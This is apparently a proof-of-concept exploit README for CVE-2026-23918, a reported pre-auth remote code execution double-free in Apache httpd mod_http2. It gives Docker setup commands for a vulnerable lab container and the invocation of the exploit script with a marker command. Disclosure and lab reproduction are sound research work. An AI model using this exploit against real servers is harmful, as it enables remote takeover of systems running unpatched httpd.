Share
## https://sploitus.com/exploit?id=8A69D3F8-27C0-508D-B54A-79182141AB36
# CVE-2026-23918

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

Affected: httpd 2.4.66 with mod_http2 and multi-threaded MPM (event/worker).
Fixed in: 2.4.67.

Found and reported by Bartlomiej Dmitruk ([striga.ai](https://striga.ai)) and Stanislaw Strzalkowski ([isec.pl](https://isec.pl)).

Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free

## Requirements

- Docker
- Python 3

## Usage

Build and start the vulnerable environment:

```sh
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
```

Get `system()` and scoreboard addresses:

```sh
docker exec httpd-poc python3 /getaddr.py 1
```

Run the exploit:

```sh
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system  --scoreboard 
```

Verify (execution is probabilistic, may take minutes to hours):

```sh
docker exec httpd-poc cat /tmp/win
```

## Cleanup

```sh
docker rm -f httpd-poc
```